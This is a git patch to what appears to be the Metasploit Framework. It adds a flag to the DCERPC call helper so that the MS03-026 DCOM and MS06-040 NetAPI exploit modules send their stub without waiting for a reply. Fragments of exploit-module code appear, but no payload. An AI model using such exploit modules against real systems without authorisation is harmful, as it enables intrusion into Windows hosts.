From ffbea6199f02e99bcffb2883094c0dd0c78d0fc2 Mon Sep 17 00:00:00 2001
From: Joshua Drake <github.jdrake@qoop.org>
Date: Tue, 11 Jan 2011 17:56:27 +0000
Subject: [PATCH] Do not wait for the DCERPC call to timeout

git-svn-id: file:///home/svn/framework3/trunk@11545 4d416f70-5f16-0410-b530-b9f4589650da
---
 lib/msf/core/exploit/dcerpc.rb                   | 4 ++--
 modules/exploits/windows/dcerpc/ms03_026_dcom.rb | 2 +-
 modules/exploits/windows/smb/ms06_040_netapi.rb  | 4 ++--
 3 files changed, 5 insertions(+), 5 deletions(-)

diff --git a/lib/msf/core/exploit/dcerpc.rb b/lib/msf/core/exploit/dcerpc.rb
index a6739efb0c..2bb31503ea 100644
--- a/lib/msf/core/exploit/dcerpc.rb
+++ b/lib/msf/core/exploit/dcerpc.rb
@@ -128,12 +128,12 @@ module Exploit::Remote::DCERPC
 		end
 	end
 
-	def dcerpc_call(function, stub = '', timeout=nil)
+	def dcerpc_call(function, stub = '', timeout=nil, do_recv=true)
 		otimeout = dcerpc.options['read_timeout']
 
 		begin
 			dcerpc.options['read_timeout'] = timeout if timeout
-			dcerpc.call(function, stub)
+			dcerpc.call(function, stub, do_recv)
 		rescue ::Rex::Proto::SMB::Exceptions::NoReply, Rex::Proto::DCERPC::Exceptions::NoResponse
 			print_status("The DCERPC service did not reply to our request")
 			return
diff --git a/modules/exploits/windows/dcerpc/ms03_026_dcom.rb b/modules/exploits/windows/dcerpc/ms03_026_dcom.rb
index 6212c64c43..771b2c2f82 100644
--- a/modules/exploits/windows/dcerpc/ms03_026_dcom.rb
+++ b/modules/exploits/windows/dcerpc/ms03_026_dcom.rb
@@ -214,7 +214,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		print_status('Sending exploit ...')
 		begin
-			dcerpc_call(0, stubdata)
+			dcerpc_call(0, stubdata, nil, false)
 		rescue Rex::Proto::DCERPC::Exceptions::NoResponse
 		end
 
diff --git a/modules/exploits/windows/smb/ms06_040_netapi.rb b/modules/exploits/windows/smb/ms06_040_netapi.rb
index 768a3383f7..9ec4132a95 100644
--- a/modules/exploits/windows/smb/ms06_040_netapi.rb
+++ b/modules/exploits/windows/smb/ms06_040_netapi.rb
@@ -311,8 +311,8 @@ class Metasploit3 < Msf::Exploit::Remote
 		print_status("Calling the vulnerable function...")
 
 		begin
-			dcerpc.call(0x1f, stub)
-			dcerpc.call(0x1f, stub)
+			dcerpc.call(0x1f, stub, false)
+			dcerpc.call(0x1f, stub, false)
 		rescue Rex::Proto::DCERPC::Exceptions::NoResponse
 		rescue => e
 			if e.to_s !~ /STATUS_PIPE_DISCONNECTED/